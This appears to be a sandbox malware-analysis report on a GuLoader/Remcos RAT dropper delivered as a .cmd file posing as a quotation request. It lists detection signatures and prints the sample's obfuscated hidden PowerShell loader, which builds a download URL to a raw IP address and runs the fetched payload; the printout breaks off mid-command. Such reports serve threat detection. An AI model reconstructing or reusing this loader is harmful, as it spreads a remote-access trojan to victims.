Edit tour
Windows
Analysis Report
Teklif talebi BAKVENTA-BAKUUsurpationens.cmd
Overview
General Information
Detection
GuLoader, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sleep loop found (likely to delay execution)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 7448 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\Tekli f talebi B AKVENTA-BA KUUsurpati onens.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7456 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7504 cmdline:
powershell .exe -wind owstyle hi dden "$Nab olandenes = 1;$Kapsl e='S';$Kap sle+='ubst rin';$Kaps le+='g';Fu nction Han dig($Fylde penneblkke t){$Byttef orholdet=$ Fyldepenne blkket.Len gth-$Nabol andenes;Fo r($Columba ries=4; $C olumbaries -lt $Bytt eforholdet ; $Columba ries+=(5)) {$Festskri ftets+=$Fy ldepennebl kket.$Kaps le.Invoke( $Columbar ies, $Nabo landenes); }$Festskri ftets;}fun ction Xero therm($Dra pers){& ($Normalp risen) ($D rapers);}$ Palmehaver s=Handig ' K njMResao Afstznedsi Festl urlF okuaUnr /h alf5Re,u. Unb0bld T an(PostWFr ekiSpeenGa rddv,cioIn f.wSings H ea BracN R oqTL.at Ba bo1D,mi0Qq .a.Sten0Pr op;Thec De fiWNonciEt agnOpry6Am el4Topc;Ge la HetzxIn dk6Comp4F. rt;Bill Er hvr Denv N .n:.syc1Ba si2sdsu1ge t.Jens0 S pa)Prim Un boGStameSl eec,fskkLo vloMain/ . om2Nulp0Ca rb1F rr0Re or0Offi1.y kk0Ahis1Tf fe TreF Tw oiunwrr Di seSvrdfGat tos,rix Ib r/Poli1Far .2Dump1 As .Enhy0Thu s ';$Nysse liges=Hand ig ',undU Eges ignes notr Ins-A lbuA,lleg, useeUpstnI soitAnni ' ;$Fordomme s=Handig ' odeh Zigt GacatJ,jup Fl,:.ent/ B gg/ lor8 Aden7Tors. Do.m1Mult2 Und1dy,n. unbr1cute0 Reg5Appl. Mast1 ic6A mb3Dete/F iltTUnexeK onsrwa.smA ut.i rovnS ka.aStocl PatjBipaoT igebD sk.O vertMetaoE kspcRhab ' ;$Problema nalysernes =Handig 'U ro.>Fe.l ' ;$Normalpr isen=Handi g 'Mic.iSk aaeRegex S tr ';$Schi zophasia=' Heterozygo tes';Xerot herm (Hand ig 'UndeSR egoePas.tD ehu- Je C Stio UnsnG eomtUnteeT alln Re.tS pir Stil-B eatPImpra StetplurhS l.g Ko,mT H.b:Part\S p,nK.also, mpir AlysN itre W mtS emisMonr.T .att Ch xs ,nstDisp , fsk-FuglV La,aTipslS karuLa,se Bo lr t$ u scSMisac H ydhR.kei l ooz KigoRe p.pLderhAc icaDisrsAp peiAggra,r ro;Ge e ') ;Xerotherm (Handig ' S,pi Chef ,or Labr( AaletFacoe TorsDub t indk- Strp MalaaHeavt Ti.eh,ndi H neT Li.: sp l\DemoK AbsooRekor MenisA.foe UnsctUn es .eta.Unibt Bentx Adet A.s)Kvin{ eksae Pasx ,oeci Rent Equa} Fer; trop ');$W edeln = Ha ndig 'Nonm edemycBede h iewoFor edan%kon.a l,plpFarmp MakedAra a WoodtBisua Raft% Gen\ Ma,ePRiksl TilleSpaau oodrFun.o SenstForbh C.mpoLys,t Tito Ca n Unblu Ma,s Amer.ImprD DistiDi,il Las Gara& Post&Staf C,loeF.toc GennhFango Chi, Tor$O ver ';Xero therm (Han dig 'tore$ mangOthil TriloUnstb Tr,na.aval ove:paabS Opt.w Enge Dir.eLus p AntryT pe= Gaze(S ecc StrmPnhed Udda Fejl/ ,avlcPr t Utl$,agsWT rine,ilbd DydeFly.lT y.inKar.)P lat ');Xer otherm (Ha ndig 'Pr s $BriegStra l ,odoNo,i b ,ndaInte lSu.e:Faco D CleeDo.a b PriaNark tbeeftKont e VaraBram tUds.rCam eIc.nn Sto eUtths Reu =Tall$Plam FAn.no F r rStradc.ib oDisgmNste mIns,eKlar sCali.Pr b sdetepKr,v lReaciSang t Urf(Gill $TeisP Sk. rE spoProm bB tol Dom eCuttmT,ld a.allnRham aJordlopry yPicksWo k eArtsrBox.